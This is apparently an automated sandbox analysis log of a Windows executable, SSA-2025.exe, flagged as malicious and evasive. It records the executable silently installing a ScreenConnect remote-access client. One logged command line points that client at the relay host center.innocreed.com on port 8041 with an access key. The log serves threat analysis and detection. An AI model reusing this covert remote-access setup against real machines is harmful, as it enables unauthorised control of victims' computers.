                        Source: SSA-2025.exe, 00000000.00000002.2192389001.00000000052C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2186286653.0000000003D2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2276559398.000000000ACF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2221424696.0000000007A2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.000000000087F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.000000000087F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2191890596.0000000005210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2181606363.0000000002B40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2195384007.00000000056CC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2195384007.00000000056CC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2195384007.00000000056CC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2195384007.00000000056CC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2192468053.00000000052E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2192468053.00000000052E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs SSA-2025.exe
                        Source: SSA-2025.exe, 00000000.00000002.2192468053.00000000052E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenamezlib.dll2 vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenamewixca.dll\ vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs SSA-2025.exe
                        Source: SSA-2025.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs SSA-2025.exe
                        Source: SSA-2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: ScreenConnect.WindowsBackstageShell.exe.3.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.WindowsBackstageShell.exe.3.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.WindowsBackstageShell.exe.3.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.Windows.dll.3.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                        Source: ScreenConnect.Windows.dll.3.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: ScreenConnect.Windows.dll.3.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: ScreenConnect.ClientService.dll.3.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: classification engineClassification label: mal42.evad.winEXE@17/56@1/1
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)Jump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SSA-2025.exe.logJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeMutant created: NULL
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                        Source: C:\Users\user\Desktop\SSA-2025.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                        Source: SSA-2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SSA-2025.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                        Source: C:\Users\user\Desktop\SSA-2025.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI5068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5329125 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                        Source: SSA-2025.exeVirustotal: Detection: 30%
                        Source: SSA-2025.exeReversingLabs: Detection: 26%
                        Source: SSA-2025.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                        Source: SSA-2025.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                        Source: C:\Users\user\Desktop\SSA-2025.exeFile read: C:\Users\user\Desktop\SSA-2025.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\SSA-2025.exe "C:\Users\user\Desktop\SSA-2025.exe"
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\b396bb1a05b88972\ScreenConnect.ClientSetup.msi"
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 77996A92415BC7E4E56BE4DDF3B31CAF C
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI5068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5329125 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C8D888593058E7DDA6859E14664551F4
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 182E158D48F4BA225447276ED56B56FB E Global\MSI0000
                        Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=center.innocreed.com&p=8041&s=6c62cec4-0045-44a2-9676-9cabae1b6b1b&k=BgIAAACkAABSU0ExAAgAAAEAAQD5eiIqIHsxbbvJUJju2o82x7Ep34oIQZtumNOfmF4LM6HXDbFuI5yxLKcIMB7dVhdMHCECqOoo0CzNTHKap5C2TNY0NNPZSQkyEv%2f%2fVaER%2b7e3LLhtH54iO65DKzgoQuj%2blt0GlYT7ExfyVq3FDxa2kOFj%2fgCEmsxgZjF%2f36qxt%2fdj%2bLbZb74bn%2bsm3SuHGI%2baXhPLm9qVqNy%2bY1x3H93WEGpGAakvhPnn0jZJGWrhcpCZG4tJ5sZjStPGzqo3h%2bo1QwwVG03T%2b1Dz72fUu9PeY5InprNAq1NGXCTH4b9yyDiryDlWVdI4XdnjPUI4WFw6QLO%2bUacmvAbLHh0v8nyd"
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe" "RunRole" "d9b4ef3e-cffc-4b3d-b5e1-180b85b6a477" "User"
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe" "RunRole" "fffce9a5-b0ba-47fb-9648-3719b7db50ee" "System"
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\b396bb1a05b88972\ScreenConnect.ClientSetup.msi"Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 77996A92415BC7E4E56BE4DDF3B31CAF CJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C8D888593058E7DDA6859E14664551F4Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 182E158D48F4BA225447276ED56B56FB E Global\MSI0000Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI5068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5329125 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe" "RunRole" "d9b4ef3e-cffc-4b3d-b5e1-180b85b6a477" "User"Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe" "RunRole" "fffce9a5-b0ba-47fb-9648-3719b7db50ee" "System"Jump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
